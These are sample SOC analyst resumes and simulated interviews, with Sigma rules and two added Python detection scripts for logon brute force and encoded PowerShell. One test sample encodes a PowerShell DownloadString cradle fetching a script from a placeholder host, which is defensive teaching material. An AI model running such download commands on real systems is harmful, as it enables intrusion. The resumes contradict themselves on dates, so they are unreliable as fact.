Cybersecurity Resume Examples & Interview Q

The document provides examples of resumes and simulated interviews for entry-level and L1 cybersecurity analyst positions. It highlights the qualifications, skills, and experiences of candidates Wayne Rooney and Cristiano Ronaldo, showcasing their education, certifications, technical skills, and hands-on projects. Additionally, it includes a series of interview questions and answers that demonstrate the candidates' knowledge of cybersecurity concepts and their problem-solving abilities in real-world scenarios.

Uploaded by mr.mafo88

CYBERSECURITY RESUME EXAMPLES AND FULL INTERVIEW SIMULATION

BY IZZMIER IZZUDDIN

ENTRY-LEVEL CYBERSECURITY ANALYST RESUME

WAYNE ROONEY
Cybersecurity Analyst | Aspiring Blue Teamer
Kuala Lumpur, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/waynerooney | GitHub: github.com/wayne

PROFESSIONAL SUMMARY

Highly motivated and detail-oriented cybersecurity enthusiast with foundational IT
knowledge and hands-on training in threat detection, incident response and log analysis.
Completed multiple Capture The Flag (CTF) challenges and simulated SOC labs. Holds
CompTIA Security+ and trained on SIEM platforms such as Splunk and Wazuh. Seeking to
contribute to a Security Operations Centre (SOC) team and grow as a Cybersecurity
Analyst.

EDUCATION

Bachelor of Information Technology (Networking)
Universiti Teknologi MARA (UiTM), Malaysia
Graduation: July 2023 | CGPA: 3.42

Relevant Coursework:

• Network Security
• Operating Systems
• Ethical Hacking & Penetration Testing
• Information Assurance

CERTIFICATIONS

• CompTIA Security+ (SY0-601) – Issued Oct 2023
• TryHackMe – SOC Level 1 Learning Path – Completed Jan 2024
• Google Cybersecurity Professional Certificate – Coursera, Completed March 2024

TECHNICAL SKILLS

Cybersecurity Tools:
Splunk, Wazuh, Wireshark, Security Onion, VirusTotal, MITRE ATT&CK Navigator, Zeek

Operating Systems:
Windows 10/11, Linux (Ubuntu, Kali), Windows Server 2016

Networking & Protocols:
TCP/IP, DNS, HTTP/S, FTP, SMB, VPN, SSH

Others:
Basic knowledge of PowerShell & Bash scripting, Ticketing Systems (ManageEngine demo)

PROJECTS & HANDS-ON EXPERIENCE

Virtual SOC Analyst Lab (Self-Learning Project)

• Set up Security Onion on a virtual lab to simulate log collection and alert analysis
• Analysed suspicious network traffic using Zeek and Suricata logs
• Created basic Splunk queries to detect brute force attacks and port scanning

TryHackMe “SOC Level 1” Path

• Investigated multiple attack scenarios including phishing, ransomware and lateral
movement
• Practiced alert triaging, log analysis and writing incident reports

Personal GitHub Portfolio

• Hosts analysis reports from CTF challenges
• Includes Sigma rule modifications and mock playbooks

INTERNSHIP EXPERIENCE

IT Support Intern
Maybank Berhad – Kuala Lumpur, Malaysia
Jan 2023 – June 2023

• Assisted in managing user access, password resets and endpoint troubleshooting
• Participated in basic security awareness campaigns
• Documented and escalated incidents to senior staff

CAPTURE THE FLAG (CTF) EXPERIENCE

• TryHackMe: Top 5% global rank (Username: wayne_cyber)
• BlueTeamLabs.online: Completed 20+ challenges
• Created write-ups for phishing detection, suspicious PowerShell analysis and
malicious email headers

SOFT SKILLS

• Strong analytical and problem-solving skills
• Fast learner, highly adaptable
• Excellent communication and documentation skills
• Team-oriented and reliable

SIMULATED INTERVIEW FOR AN ENTRY-LEVEL CYBERSECURITY ANALYST (L1) POSITION

SECTION 1: INTRODUCTION & BACKGROUND

Interviewer: Welcome, Wayne. Can you start by telling us a bit about yourself and why
you're interested in this role at Cybermir Defense?

Candidate (Wayne): Thank you for the opportunity. I’m Wayne Rooney, a recent graduate
in IT Networking from UiTM. During my studies and internship, I developed a strong interest
in cybersecurity, especially blue team operations. I’ve since completed several online
labs, including the TryHackMe SOC Level 1 path and earned my Security+ certification.
I’m excited about the role at Cybermir Defense because of your reputation in managed
SOC services and your use of advanced tools like Cortex XDR and Splunk. I believe this
environment will help me grow technically and contribute to real-world cyber defence
operations.

SECTION 2: CYBERSECURITY FUNDAMENTALS

Interviewer: What is the CIA triad and why is it important in cybersecurity?

Candidate: The CIA triad stands for Confidentiality, Integrity and Availability. It's the
foundation of security principles:

• Confidentiality ensures data is accessible only to authorised users.
• Integrity ensures the accuracy and trustworthiness of data.
• Availability ensures that data and services are accessible when needed.

Maintaining the balance of these three is crucial for any secure system.

Interviewer: What is the difference between a vulnerability, a threat and a risk?

Candidate:

• A vulnerability is a weakness in a system (e.g., an unpatched OS).
• A threat is anything that can exploit that vulnerability (e.g., a hacker).
• A risk is the potential damage that could happen if the threat exploits the
vulnerability.

Interviewer: Can you explain the concept of least privilege?

Candidate: The principle of least privilege means giving users the minimum access or
permissions they need to perform their job. It helps reduce the risk of accidental or
intentional misuse of systems.

SECTION 3: TECHNICAL QUESTIONS

Interviewer: What are some common indicators of compromise (IOCs) you would look for
in log data?

Candidate: Common IOCs include:

• Unusual login times
• Multiple failed login attempts
• Access from foreign IPs or TOR nodes
• Sudden privilege escalation
• Command-line execution with suspicious flags (e.g., PowerShell with base64)
• Communication with known malicious domains or IPs

Interviewer: Let’s say you receive a SIEM alert showing 20 failed login attempts followed
by one successful login. What would you do?

Candidate: First, I’d verify the user and the source IP. Then:

1. Check the timeline and geolocation for anomalies.
2. Correlate with previous login history.
3. See if the IP is known or blacklisted.
4. Notify the incident response team if brute-force or credential stuffing is suspected.
5. Potentially isolate the system or disable the account if malicious activity is
confirmed.

Interviewer: How does DNS tunnelling work?

Candidate: DNS tunnelling is a technique where attackers encapsulate data into DNS
queries and responses to exfiltrate data or establish command-and-control. Since DNS
traffic is usually allowed, it can bypass firewalls if not inspected deeply.

SECTION 4: SCENARIO-BASED QUESTIONS

Interviewer: Imagine a user reports their system is running slow and files are being
renamed with a “.encrypted” extension. What do you do?

Candidate: Sounds like a ransomware infection. I would:

1. Immediately isolate the endpoint from the network.
2. Inform the IR team and escalate the ticket.
3. Collect logs from EDR and SIEM for file modification, processes and command-line
activity.
4. Check for any lateral movement or propagation to other systems.
5. Identify the ransomware family via hash or note and reference threat intel.
6. Check backups for restoration and follow containment procedures.

Interviewer: You're on shift and receive a phishing alert triggered by the email gateway.
What steps will you take?

Candidate:

1. Review the email header (source, SPF/DKIM/DMARC status).
2. Check if the email contains suspicious links or attachments.
3. Identify recipients and whether the link was clicked.
4. Use a sandbox (e.g., Any.Run or VirusTotal) to analyse the payload.
5. Quarantine the email from all mailboxes.
6. Raise an incident if malicious and notify affected users with instructions.

SECTION 5: SOC DAILY RESPONSIBILITIES

Interviewer: What do you understand about SOC L1 daily duties?

Candidate: SOC L1 analysts monitor SIEM alerts, investigate low to moderate severity
events, escalate confirmed incidents and document findings. We triage alerts based on
priority and relevance, check log sources, perform basic correlation and escalate complex
cases to L2.

Interviewer: Have you used any ticketing systems?

Candidate: I’ve explored ManageEngine and ServiceNow in lab environments. I’m familiar
with raising, updating and closing tickets following standard operating procedures.

SECTION 6: COMMUNICATION & DOCUMENTATION

Interviewer: Why is documentation important in incident response?

Candidate: Documentation ensures traceability, helps in post-incident analysis and
supports compliance. It also enables knowledge sharing and consistency across the SOC
team.

Interviewer: How do you explain a technical issue to a non-technical client?

Candidate: I avoid jargon and use relatable analogies. For example, I might compare
phishing to someone pretending to be your bank and asking for your password. Clear,
simple language builds trust and understanding.

SECTION 7: BEHAVIOURAL & CAREER GOALS

Interviewer: Tell us about a time you faced a technical challenge and how you resolved it.

Candidate: In my TryHackMe lab, I couldn’t figure out how to decode an obfuscated
PowerShell command. I researched online, used CyberChef to decode it and discovered it
was part of a C2 beacon. That experience taught me patience, research skills and the
importance of using the right tools.

Interviewer: Where do you see yourself in the next 3 years?

Candidate: I aim to move into an L2 role, get certified in Blue Team Level 1 or SC-200 and
specialise in threat hunting. I also want to mentor newcomers and eventually contribute to
building detection use cases.

Interviewer: Do you prefer working independently or in a team?

Candidate: I’m comfortable with both. I enjoy independent investigations but also value
team discussions, especially during threat reviews and knowledge sharing.

INTERVIEW WRAP-UP

Interviewer: Thank you, Wayne. Do you have any questions for us?

Candidate: Yes, thank you. I’d like to ask:

1. What’s the typical growth path for an analyst here?
2. How often does the team conduct tabletop exercises or red/blue simulations?
3. Will I be involved in alert tuning or just triage initially?

CYBERSECURITY ANALYST L1 RESUME

CRISTIANO RONALDO
Cybersecurity Analyst | Threat Detection | Incident Response
Cyberjaya, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/cristianoronaldo | GitHub: github.com/cristianocyber

PROFESSIONAL SUMMARY

Results-driven Cybersecurity Analyst with over 2 years of hands-on experience in a 24/7
Managed SOC environment, specialising in log analysis, incident triage and threat
detection. Experienced with multiple SIEM platforms including Splunk and Wazuh,
endpoint detection (Cortex XDR) and email security. Proven ability to handle real-world
security incidents from detection to documentation and assist in tuning detection rules.
Now seeking to transition to an L2 role with greater ownership over threat response,
investigation and proactive threat hunting.

EDUCATION

Bachelor of Information Technology (Networking)
Universiti Teknologi MARA (UiTM), Malaysia
Graduated: July 2023 | CGPA: 3.42

CERTIFICATIONS

• CompTIA Security+ – Issued Oct 2023
• Blue Team Level 1 (BTL1) – Issued Mar 2025
• Microsoft SC-200 (Security Operations Analyst) – In Progress
• TryHackMe: SOC Level 2 Path – Ongoing

TECHNICAL SKILLS

SIEM & Detection Tools:
Splunk, Wazuh, IBM QRadar, Cortex XDR, SentinelOne, Security Onion

Threat Intelligence & Forensics:
VirusTotal, Any.Run, AbuseIPDB, MITRE ATT&CK, CyberChef, Zeek

Scripting & Automation:
Basic Python (alert enrichment), Bash, Sigma Rule writing

Cloud & Email Security:
O365 Defender, Gmail Security Center, AWS CloudTrail

Other Tools:
Nmap, Wireshark, Windows Event Viewer, OSQuery, Sysmon

EXPERIENCE

Cybersecurity Analyst (L1)
IzzmierCyber Defense Sdn Bhd, Kuala Lumpur
Aug 2023 – Present

• Triaged 1000+ security alerts using Splunk, Cortex XDR and Wazuh platforms
• Handled phishing, brute-force, data exfiltration attempts and privilege escalation
alerts
• Performed initial incident investigation (host-based, network-based and email-
based)
• Participated in on-call rotations for critical incident escalations
• Assisted in rule tuning and alert enrichment using MITRE mappings
• Generated daily and weekly security reports for client stakeholders
• Created and maintained internal SOC playbooks and alert response templates
• Conducted knowledge-sharing sessions for newly hired L1 analysts

Key Achievements:

• Promoted to Senior L1 within 10 months based on performance
• Automated part of IOC lookups with Python + VirusTotal API
• Involved in minor threat hunting activity using OSQuery and Splunk correlation

PROJECTS & INITIATIVES

Internal Threat Simulation Lab (Blue Team Focus)

• Simulated endpoint attacks (ransomware, credential dumping) using Caldera
• Tested detection coverage via Wazuh and Cortex XDR
• Documented gaps and recommended Sigma rule updates

SOC Process Improvement Initiative

• Reviewed alert fatigue issues and identified redundant use cases
• Proposed correlation logic changes that reduced false positives by 30%

DOCUMENTATION & REPORTING

• Created 20+ internal case studies of handled incidents (de-identified)
• Standardised reporting format for phishing and malware alerts
• Developed custom MITRE ATT&CK mapping sheets for internal training

CTF & CONTINUOUS LEARNING

• TryHackMe: SOC Level 2 path (Completed 75%)
• BlueTeamLabs.online: Completed 35+ challenges
• GitHub: Hosts IOC analysis, log walkthroughs and SIEM detection tests
• Regularly follows threat feeds from Group-IB, CISA and SANS

SOFT SKILLS

• Effective under pressure (shift-based, high alert volume)
• Excellent verbal & written communication (client-facing alerts & reports)
• Strong sense of ownership & escalation judgment
• Passionate about knowledge-sharing and mentorship

SIMULATED INTERVIEW FOR CURRENTLY WORKING AS A CYBERSECURITY ANALYST L1 AND APPLYING FOR A CYBERSECURITY ANALYST L2 POSITION

SECTION 1: INTRODUCTION & MOTIVATION

Interviewer: Welcome, Cristiano. Could you please introduce yourself and share why
you're applying for this Cybersecurity Analyst L2 position at Cybermir Defence?

Candidate (Cristiano): Thank you. I’m Cristiano Ronaldo, currently a Senior Cybersecurity
Analyst L1 at IzzmierCyber Defense, where I’ve been for the past two years. My role
involves triaging alerts, performing incident investigations and supporting rule tuning.
I’m applying for this L2 position because I want to take on greater responsibility in handling
end-to-end incident response, threat hunting and play a bigger role in detection
engineering. I believe Cybermir Defence's reputation for advanced threat detection,
red/blue team collaboration and your use of modern tech stack really aligns with my
growth goals.

SECTION 2: CORE CYBERSECURITY KNOWLEDGE

Interviewer: What’s the difference between an Indicator of Compromise (IOC) and an
Indicator of Attack (IOA)?

Candidate: An IOC refers to artefacts like file hashes, IP addresses or domain names that
signal a system might be compromised.
An IOA, on the other hand, focuses on the behaviour or intent behind the activity, such as a
process spawning PowerShell or lateral movement using SMB. IOAs are more proactive for
early-stage detection, especially for fileless or evolving threats.

Interviewer: Explain the MITRE ATT&CK framework. How do you use it in daily SOC
operations?

Candidate: MITRE ATT&CK is a matrix of adversary tactics, techniques and procedures
(TTPs) based on real-world observations.
In my role, I use it to map alerts during investigations to understand the attack stage,
whether it’s Initial Access (like T1190: Exploit Public-Facing App) or Persistence (like
T1547: Registry Run Keys). We also use it when building new use cases and to evaluate our
detection coverage across the kill chain.

Interviewer: What are common false positives in a SOC and how do you reduce them?

Candidate: Some common ones include:

• Legitimate admin activity flagged as lateral movement
• Vulnerability scans mistaken as recon
• User forgetting password triggering brute-force alerts

To reduce false positives, I help by:

1. Creating allowlists for known tools and sources
2. Enhancing correlation rules with contextual logic
3. Using threat intel feeds to validate IOCs
4. Documenting patterns in our alert tuning wiki

SECTION 3: TECHNICAL EXPERTISE

Interviewer: You mentioned you work with Cortex XDR and Splunk. Can you walk us
through a typical investigation process you follow for a suspicious alert?

Candidate: Certainly. Let's say I get an alert from Cortex XDR for powershell.exe making a
network connection:

1. Triage: Review alert metadata, process path, parent process, command-line
arguments, timestamp.
2. Correlation: Pivot to Splunk to check related events like login activity (4624/4625),
scheduled tasks, registry writes.
3. Threat Intel: Check IP or domain via VirusTotal and AbuseIPDB.
4. Scope: Search for lateral movement using winrm, wmic or file drops to other
systems.
5. Response: Isolate host if confirmed malicious, notify endpoint user and escalate
with detailed incident report.
6. Post-Incident: Update playbook if this variant hasn’t been handled before.

Interviewer: How would you write a basic Sigma rule to detect PowerShell downloads?

Candidate: Sure. A basic Sigma rule might look like this:

title: PowerShell Web Download
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains: ['Invoke-WebRequest', 'iwr', 'DownloadString']
    condition: selection
level: high
tags:
    - attack.execution
    - attack.t1059.001

We use this to generate detections in platforms like Wazuh or translate to Splunk via
backend converters.

SECTION 4: SCENARIO-BASED INVESTIGATION

Interviewer: Let’s simulate a real-world case. You received a high-severity alert from
Splunk:

“Multiple failed logins from 1.1.1.1 to 5 different admin accounts within 2 minutes. One
success.”

Walk us through your investigation steps.

Candidate:

1. Validate the Alert: Check if the source IP is internal or external.
2. Enrich Context:
   o Pull the event logs (4625 + 4624)
   o Check geo-location of 1.1.1.1; if foreign, red flag
   o Query user activity: Was this login normal for them? Any previous failed
   attempts?
3. Investigate Success:
   o Device used, lateral movement post-login
   o Sessions opened, commands executed
4. Hunt Laterally:
   o Use Sysmon and firewall logs to see if the attacker moved
   o Check if tools like Mimikatz or certutil were used
5. Respond:
   o Disable compromised accounts
   o Notify IR team, isolate hosts
   o Document root cause (e.g., brute force or credential reuse)
6. Improve Detection:
   o Tune thresholds or enrich with MFA status
   o Add watchlist IP if external
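Both SIEM-alert scenarios in this document (Wayne's 20 failures followed by one success, and the five-admin-account case above) come down to one correlation: failed logons from a source inside a window, then a success from the same source. The block below is an added example, not part of the simulated interview or the author's material; it implements that correlation in Python over constructed 4625/4624 events with simplified field names of my own (not Splunk's), checks whether the source is external as in step 1, and labels the pattern brute force or password spraying by how many accounts were targeted.

```python
"""Correlate a run of failed logons (4625) with a later success (4624) from the
same source IP. Sample events are constructed for this example; the field names
are simplified, not a SIEM's native schema."""
import ipaddress
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample: eight failures against five admin accounts from 1.1.1.1
# inside two minutes, then one success for admin4; plus one benign typo from an
# internal workstation that must not be flagged.
SAMPLE_EVENTS = [
    {"ts": "2025-01-10T02:00:05", "event_id": 4625, "src_ip": "1.1.1.1", "user": "admin1"},
    {"ts": "2025-01-10T02:00:09", "event_id": 4625, "src_ip": "1.1.1.1", "user": "admin2"},
    {"ts": "2025-01-10T02:00:14", "event_id": 4625, "src_ip": "1.1.1.1", "user": "admin3"},
    {"ts": "2025-01-10T02:00:20", "event_id": 4625, "src_ip": "1.1.1.1", "user": "admin4"},
    {"ts": "2025-01-10T02:00:27", "event_id": 4625, "src_ip": "1.1.1.1", "user": "admin5"},
    {"ts": "2025-01-10T02:00:33", "event_id": 4625, "src_ip": "1.1.1.1", "user": "admin1"},
    {"ts": "2025-01-10T02:00:41", "event_id": 4625, "src_ip": "1.1.1.1", "user": "admin2"},
    {"ts": "2025-01-10T02:00:50", "event_id": 4625, "src_ip": "1.1.1.1", "user": "admin4"},
    {"ts": "2025-01-10T02:01:40", "event_id": 4624, "src_ip": "1.1.1.1", "user": "admin4"},
    {"ts": "2025-01-10T02:05:00", "event_id": 4625, "src_ip": "10.0.0.15", "user": "wayne"},
    {"ts": "2025-01-10T02:05:20", "event_id": 4624, "src_ip": "10.0.0.15", "user": "wayne"},
]


def correlate_logons(events, fail_threshold=5, window=timedelta(minutes=2)):
    """Return one finding per 4624 that was preceded, within `window`, by at
    least `fail_threshold` 4625 events from the same source IP."""
    by_ip = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_ip[ev["src_ip"]].append(ev)

    findings = []
    for ip, evs in by_ip.items():
        for i, ev in enumerate(evs):
            if ev["event_id"] != 4624:
                continue
            success_at = datetime.fromisoformat(ev["ts"])
            # Only failures from this IP that fall inside the lookback window count.
            fails = [
                f for f in evs[:i]
                if f["event_id"] == 4625
                and success_at - datetime.fromisoformat(f["ts"]) <= window
            ]
            if len(fails) < fail_threshold:
                continue
            targeted = Counter(f["user"] for f in fails)
            findings.append({
                "src_ip": ip,
                # Step 1 of the walkthrough: internal or external source?
                "is_external": ipaddress.ip_address(ip).is_global,
                "failed_attempts": len(fails),
                "distinct_accounts": len(targeted),
                "compromised_user": ev["user"],
                # Many accounts, few tries each -> spraying; one account hammered -> brute force.
                "pattern": "password_spraying" if len(targeted) > 1 else "brute_force",
                "window_start": fails[0]["ts"],
                "success_at": ev["ts"],
            })
    return findings


if __name__ == "__main__":
    for finding in correlate_logons(SAMPLE_EVENTS):
        print(finding)
```

The threshold and window arguments are the two knobs step 6 (Improve Detection) talks about tuning.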

SECTION 5: THREAT HUNTING & TOOLING

Interviewer: Have you participated in threat hunting? Describe a hunt you've done.

Candidate: Yes. I recently ran a hunt based on the T1059.001 (PowerShell Execution)
technique.

• Objective: Identify misuse of PowerShell beyond normal admin tasks
• Hypothesis: Attackers use PowerShell with encoded commands to bypass
detection
• Method:
   o Queried Splunk for PowerShell with long base64 strings
   o Checked command length > 1000 chars
   o Used CyberChef to decode
   o Found an instance of PowerShell being used to drop reverse shell script
• Outcome: Blocked the IP, blacklisted hash, created a new Sigma rule and shared
findings with the L1 team

Interviewer: Do you use any open-source tools or platforms to support your work?

Candidate: Absolutely. My common toolkit includes:

• CyberChef: Decoding and data transformations
• Zeek: Network visibility for threat hunting
• Any.Run & Hybrid Analysis: Sandbox analysis
• Sigma HQ & Red Canary GitHub: Detection engineering references
• I also follow CISA’s KEV list for prioritising alerts
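The encoded-PowerShell hunt described in this section (query for long base64 strings, check length over 1000 characters, decode) and Wayne's CyberChef decoding story earlier share the same decoding step. The block below is an added example, not from the original document: it pulls the -EncodedCommand argument out of constructed process command lines, decodes it the way PowerShell expects (base64 of UTF-16LE text), and flags each line by the length criterion from the hunt and by the download keywords of the Sigma rule quoted earlier in this interview. The decoded sample scripts are harmless placeholders constructed for the example.

```python
"""Hunt helper for T1059.001: find PowerShell -EncodedCommand arguments in process
command lines, decode them and flag by simple criteria. Sample command lines are
constructed here; the decoded scripts are harmless placeholders."""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_PREFIXES = ["-" + "encodedcommand"[:n] for n in range(1, 15)] + ["-ec"]
_ENC_RE = re.compile(
    r"(?:^|\s)(?:" + "|".join(re.escape(p) for p in _PREFIXES) + r")\s+([A-Za-z0-9+/]+=*)",
    re.IGNORECASE,
)
# Same keywords the Sigma rule earlier in this interview looks for (compared lowercase).
DOWNLOAD_KEYWORDS = ("invoke-webrequest", "iwr", "downloadstring")


def encode_for_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded_argument(cmdline: str):
    """Return the base64 blob following an -EncodedCommand style switch, if any."""
    m = _ENC_RE.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(cmdline: str):
    """Return the decoded script, or None if there is no valid encoded argument."""
    b64 = extract_encoded_argument(cmdline)
    if b64 is None:
        return None
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def hunt_encoded_powershell(cmdlines, max_b64_len=1000):
    """Flag command lines whose encoded payload is unusually long (the > 1000
    character check from the hunt), undecodable, or decodes to a download cradle."""
    findings = []
    for idx, line in enumerate(cmdlines):
        b64 = extract_encoded_argument(line)
        if b64 is None:
            continue
        script = decode_encoded_command(line)
        reasons = []
        if len(b64) > max_b64_len:
            reasons.append("long_encoded_command")
        if script is None:
            reasons.append("undecodable_payload")
        elif any(k in script.lower() for k in DOWNLOAD_KEYWORDS):
            reasons.append("download_keyword")
        if reasons:
            findings.append({
                "index": idx,
                "b64_length": len(b64),
                "reasons": reasons,
                "decoded_preview": (script or "")[:80],
            })
    return findings


# Constructed samples: 0 benign, 1 download cradle, 2 long padded script, 3 not encoded.
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -enc " + encode_for_powershell("Get-Date"),
    "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_for_powershell(
        "(New-Object Net.WebClient).DownloadString('http://example.invalid/u.ps1')"),
    "powershell.exe -e " + encode_for_powershell("# " + "x" * 400 + "\nGet-Process"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for finding in hunt_encoded_powershell(SAMPLE_CMDLINES):
        print(finding)
```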

SECTION 6: BEHAVIOURAL & TEAM DYNAMICS

Interviewer: Have you ever made a mistake in handling an alert? How did you handle it?

Candidate: Yes, early in my career, I mistakenly escalated a vulnerability scan as lateral
movement.
Once I realised, I informed my senior immediately, wrote a short RCA and added a note in
our internal playbook to differentiate scanner patterns (e.g., Nmap TCP Connect with
1-second gaps).
It was a learning moment on double-checking source/destination context and using
baselining before escalating.

Interviewer: How do you mentor or help your L1 peers?

Candidate: I usually do weekly 30-min review sessions with new L1s to go over unusual
alerts. I’ve also created an internal quick-reference guide for common IOCs and Splunk
queries.
It helps them feel supported and I enjoy the collaborative aspect of our SOC.

SECTION 7: CLOSING & QUESTIONS

Interviewer: Thanks Cristiano. Any questions for us?

Candidate: Yes, thank you:

1. Does your L2 role get involved in purple teaming or detection engineering directly?
2. How does Cybermir Defence handle post-incident learning, do you do
retrospectives or tabletop simulations?
3. What’s the team’s current focus, alert fatigue reduction, automation or expanding
threat coverage?

CYBERSECURITY ANALYST L2 RESUME

CARLOS TEVEZ
Cybersecurity Analyst | Threat Detection & Response | SOC Leadership Path
Kuala Lumpur, Malaysia | +60 12-345 6789 | [email protected]
LinkedIn: linkedin.com/in/carlostevez | GitHub: github.com/carloscyber

PROFESSIONAL SUMMARY

Experienced and proactive Cybersecurity Analyst with 4+ years of SOC operations,
currently serving as L2. Proven expertise in incident response, threat hunting, detection
engineering and mentoring junior analysts. Strong command over SIEM tuning, threat intel
enrichment and hands-on investigation of APT-like activity. Seeking to transition into an L3
role to take ownership of complex investigations, lead threat detection strategy and
contribute to red/blue team synergy and SOC process maturity.

CURRENT ROLE

Cybersecurity Analyst – L2
IzzmierCyber Defense Sdn Bhd, Kuala Lumpur, Malaysia
Sept 2022 – Present

• Led investigations for critical alerts involving data exfiltration, ransomware staging
and privilege escalation
• Created and maintained advanced correlation rules in Splunk, Wazuh and Microsoft
Sentinel
• Conducted root cause analysis and created incident reports for clients and internal
stakeholders
• Performed threat hunting using MITRE ATT&CK, OSQuery and Zeek logs
• Developed playbooks and detection rules for new threats (TTP-based rather than
IOC-based)
• Acted as escalation point for L1 team, reviewing alerts and assisting with triage
training
• Involved in client onboarding, log source mapping and detection readiness review
• Worked with SOAR engineers to automate repetitive tasks and triage enrichment

Key Achievements:

• Detected and contained a real-world Cobalt Strike beaconing event within 45 mins
• Reduced false positives in brute-force alerts by 40% through rule refinement
• Led a mini red vs. blue simulation with purple team to improve coverage on T1071.001
(Web C2)

EDUCATION
Bachelor of Information Technology (Networking)
Universiti Teknologi MARA (UiTM), Malaysia
Graduated: July 2023 | CGPA: 3.42

CERTIFICATIONS

• Blue Team Level 1 (BTL1) – Blue Team Certs
• Microsoft SC-200 – Security Operations Analyst
• CompTIA CySA+ – Cybersecurity Analyst
• SANS SEC450 (GCLD – in progress)
• TryHackMe: Threat Hunting, Malware Analysis & SOC2 Paths – Completed

SKILLS SNAPSHOT

SIEM & Detection: Splunk, Wazuh, Microsoft Sentinel, ArcSight
EDR/NDR: Cortex XDR, CrowdStrike Falcon, Zeek, Suricata
Threat Intel: VirusTotal, Group-IB, Any.Run, MITRE ATT&CK, YARA
Scripting & Automation: Python, Bash, Sigma rules, SOAR logic design
Incident Response: DFIR methodology, chain of custody, log correlation
Cloud Security: AWS CloudTrail, Azure Defender, O365 audit logs
Tools: CyberChef, Velociraptor, OSQuery, Kusto Query Language (KQL), Sysmon

PROJECTS & INITIATIVES

SOC Threat Maturity Framework (Internal Project)

• Developed a gap analysis dashboard based on MITRE coverage
• Prioritised use case deployment based on real threat landscape
• Collaborated with red team to validate detection rules

Sigma Rule Conversion for Custom Splunk SIEM

• Wrote and tested 30+ detection rules
• Built alert logic to detect TTPs like T1110.003 (Password Spraying), T1059.003
(WMIC)

L1 Training & Quality Control Program

• Delivered bi-weekly threat breakdown sessions
• Reviewed 200+ tickets and improved L1 decision-making accuracy by 60%

KEY INCIDENT CASES

Case #2024-MAL-RX22 – Ransomware Detected Pre-Execution

• Identified obfuscated PowerShell payload communicating with malicious IP
• Decoded base64 script and traced download to open RDP vulnerability
• Contained lateral spread using EDR and blocklisted hash in environment

Case #2025-BRU-APT3 – Malicious Use of Living-off-the-Land Binaries (LOLBins)

• Investigated odd use of certutil.exe for payload delivery
• Performed retrospective hunting and identified privilege escalation activity
• Worked with IR team to generate strategic recommendations for AD hardening

DOCUMENTATION & REPORTING

• Wrote 15+ client-facing post-incident reports
• Developed internal reporting templates with TTP mappings
• Contributed to quarterly SOC capability review presentations

CONTINUOUS LEARNING & COMMUNITY

• GitHub: Hosts Sigma rules, hunting queries, threat analysis reports
• Member: MITRE Engage, CyberDefenders.org community
• TryHackMe: Completed SOC2, Malware Analysis and Threat Intel labs
• Regular reader of DFIR Report, CISA alerts and Huntress threat feeds

SOFT SKILLS & TEAM IMPACT

• Proactive in cross-team collaboration (Red, Blue, IR)
• Strong communication for both technical and executive-level reporting
• Reliable escalation point for critical alerts
• Comfortable leading tabletop exercises and mini-IR drills

SIMULATED INTERVIEW FOR CURRENTLY A CYBERSECURITY ANALYST L2, APPLYING FOR A CYBERSECURITY ANALYST L3 POSITION

SECTION 1: INTRODUCTION & MOTIVATION

Interviewer: Hi Carlos, welcome. To start off, could you briefly introduce yourself and
share why you’re interested in joining Cybermir Defence as a Cybersecurity Analyst L3?

Candidate (Carlos): Thank you. I’m Carlos Tevez, currently working as a Cybersecurity
Analyst L2 at IzzmierCyber Defense. Over the last 4 years, I’ve grown from triaging alerts to
owning full investigations, performing threat hunts and writing detection rules. I’ve also
been mentoring L1 analysts and leading some red/blue exercises internally.
What excites me about Cybermir Defence is your strong presence in the regional MDR
space and your blend of offensive and defensive capabilities. I’m ready to contribute at the
L3 level by leading investigations, improving detection logic and collaborating with your red
team to improve coverage.

SECTION 2: CORE CYBERSECURITY KNOWLEDGE

Interviewer: What’s the difference between reactive incident response and proactive
threat hunting?

Candidate: Reactive incident response is initiated after an alert or breach has occurred,
based on existing rules or triggers. Threat hunting is proactive; it involves forming
hypotheses about undetected threats and manually searching across the environment
using behavioural patterns or weak signals, often without any initial alert.

Interviewer: Can you explain the Cyber Kill Chain vs MITRE ATT&CK?

Candidate: The Cyber Kill Chain provides a high-level sequence of attack stages, from
reconnaissance to exfiltration. It's useful for visualising the flow of an attack.
MITRE ATT&CK is more granular, it maps specific tactics, techniques and procedures used
by adversaries. I find MITRE more actionable for detection engineering, as it aligns better
with how attacks manifest in logs and telemetry.

Interviewer: When reviewing an alert, how do you determine if it’s a true positive vs a false
positive?

Candidate: I evaluate the context:

• Was the activity normal for that user/system?
• Any known tooling involved?
• Did the event chain match known TTPs (e.g., T1059.001 for PowerShell)?
• I also pivot to adjacent logs (auth, process, network) and enrich with threat intel.

A true positive usually reveals multiple layers of evidence. If isolated, I question
whether it's anomalous or benign.

SECTION 3: TECHNICAL EXPERTISE & DETECTION ENGINEERING

Interviewer: Tell us about a detection use case you developed and how you tested it.

Candidate: I developed a rule to detect living-off-the-land attacks using mshta.exe with
remote URLs (T1218.005).

• Detection logic: Look for mshta execution with http:// or .hta in the command line.
• Test: Simulated using a lab VM and executed a benign remote HTA file to
trigger detection.
• Result: Alert fired, no false positives in 7-day lookback.
I later added enrichment to pull process ancestry and geolocation of connections.

Interviewer: Have you written Sigma rules? If so, give us one for detecting credential
dumping via LSASS.

Candidate: Yes, I’ve written and converted many Sigma rules. Here's one for LSASS
access via tools like Mimikatz:

title: Suspicious LSASS Access
logsource:
    product: windows
    category: process_access
detection:
    selection:
        TargetImage|endswith: '\lsass.exe'
        GrantedAccess: '0x1410'
    condition: selection
level: high
tags:
    - attack.credential_access
